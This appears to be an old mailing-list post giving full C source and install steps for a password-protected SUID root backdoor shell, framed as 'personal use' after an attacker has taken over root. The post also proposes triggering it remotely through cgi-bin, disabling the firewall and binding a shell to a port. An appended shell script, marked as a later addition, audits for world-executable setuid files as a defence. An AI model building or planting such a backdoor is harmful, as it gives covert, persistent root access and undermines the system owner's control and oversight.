Hi,
if you intend to place a backdoor root shell for
"personal use" in your own system (because an attacker
changed the root password) then you should write a
little program with SUID root rights, executable for
every user, but demanding a password before opening a
root shell.
Passwords should not be readable in plain text (doh!),
so use MD5 hashes or so for authentication.
A small C program which does exactly this can be found
below. It should compile on most linuxes with openssl.
If all users are logged out of your system you can
modify the program and think of a way to execute it
remotely (maybe via a cgi-bin file of your web server;
this service is rarely shut down by an attacker). Then
fight back with their own weapons: instead of running
a system("/bin/sh") execute system()-commands to shut
down the firewall and bind an authenticating shell to
some port.
Cheers,
Radiodrinker


/* "adr" root backdoor in own system.

   by radiodrinker at yahoo dot de

   1. compile:
      gcc adr.c -o adr -lcrypto
      (MD5() lives in libcrypto; "-lssl" alone fails on linkers that
      do not pull libcrypto in automatically. OpenSSL 3 still ships
      MD5() but marks it deprecated, so expect a compiler warning.)
   2. As root:
      chown root adr; chmod u+s adr; chmod go+rx adr
   3. run adr. enter password of your choice.
   4. system won't let you in. copy generated md5 hash off the
      screen.
   5. paste md5 hash to identifier "correctMD5hash" (see below).
   6. repeat steps 1 and 2.
   7. login as non-root user. run adr. enter correct phrase.
   8. have fun.
   9. opt: move the file to /usr/bin/somenamethatpleasesyou
*/

#include <stdio.h>
#include <stdlib.h>       /* system() */
#include <string.h>       /* strlen(), strcmp(), strcspn() */
#include <unistd.h>       /* getuid(), setuid() */
#include <openssl/md5.h>  /* MD5(), MD5_DIGEST_LENGTH */

/* Lowercase hex MD5 of the accepted pass phrase (32 characters once
   taken from step 4; the value below is only a placeholder). */
char correctMD5hash[] = "924d162c0b4497dd37e40aadbeef5b9";

/* Render a digest as lowercase hex. "%02x" keeps the leading zero of
   bytes below 0x10; the original "%x" dropped it, so the same digest
   could print with fewer than 32 characters. */
void hexToString(const unsigned char *sourceaddress, char *destaddress,
                 int length){
  int i;
  for(i=0; i<length; i++){
    sprintf(destaddress + 2*i, "%02x", sourceaddress[i]);
  }
  destaddress[2*length]='\0';
}

int main(void){
  uid_t olduid;
  char phrase[16384];
  unsigned char md5sum[MD5_DIGEST_LENGTH];
  char md5string[2*MD5_DIGEST_LENGTH + 1];

  olduid=getuid();

  /* setuid(0) only succeeds when the binary runs with euid 0, i.e. is
     setuid root; otherwise report and stop. */
  if(setuid(0) != 0 || getuid() != 0){
    printf("must be suid root.\n");
    return 1;
  }

  printf("Banner something V2.17\n");
  printf("Enter pass phrase:");
  fflush(stdout);
  if(fgets(phrase, sizeof(phrase), stdin) == NULL){
    setuid(olduid);
    return 1;
  }
  phrase[strcspn(phrase, "\n")] = '\0';  /* drop the trailing newline */

  MD5((const unsigned char *)phrase, strlen(phrase), md5sum);
  hexToString(md5sum, md5string, MD5_DIGEST_LENGTH);

  /* Compare the whole string. The original strncmp() over
     strlen(correctMD5hash) accepted any phrase whose digest merely
     started with the stored value. */
  if(strcmp(md5string, correctMD5hash) != 0){
    /* then it does not match. */
    printf("md5 value of pass phrase is: %s\nSorry.\n", md5string);
    setuid(olduid);
  }
  else{
    printf("Welcome back. Have fun.\n");
    system("/bin/sh");
  }
  return 0;
}
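The defensive counterpart to the post, added here and not part of the original message: a POSIX shell audit that finds files set up exactly as step 2 instructs (setuid, executable by every user) and reports which of them are absent from a baseline taken on a known-good host. The function names and the one-path-per-line baseline format are my assumptions.

```shell
#!/bin/sh
# Audit helper (added example): find files set up as the post's
# "chown root; chmod u+s; chmod go+rx", i.e. setuid files that any
# user may execute, and report which ones are not in a baseline list.

# Print setuid files under DIR that are executable by "other", sorted.
# -perm -4001 requires both the setuid bit and o+x. Optional OWNER
# restricts the match to that user (root in practice).
find_suid_world_exec() {
    dir=$1
    owner=$2
    if [ -n "$owner" ]; then
        find "$dir" -xdev -type f -perm -4001 -user "$owner" 2>/dev/null | sort
    else
        find "$dir" -xdev -type f -perm -4001 2>/dev/null | sort
    fi
}

# Print scan results that are absent from BASELINE (one path per line,
# captured by an earlier run on a clean system). An empty or missing
# baseline means everything found is reported as new.
new_suid_since_baseline() {
    dir=$1
    baseline=$2
    owner=$3
    if [ -s "$baseline" ]; then
        # grep exits 1 when nothing is new; that is not an error here.
        find_suid_world_exec "$dir" "$owner" | grep -vxF -f "$baseline" || true
    else
        find_suid_world_exec "$dir" "$owner"
    fi
}

# Typical use: scan the whole root filesystem for root-owned entries.
#   find_suid_world_exec / root > suid-baseline.txt     # on a clean host
#   new_suid_since_baseline / suid-baseline.txt root    # later, to diff
```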

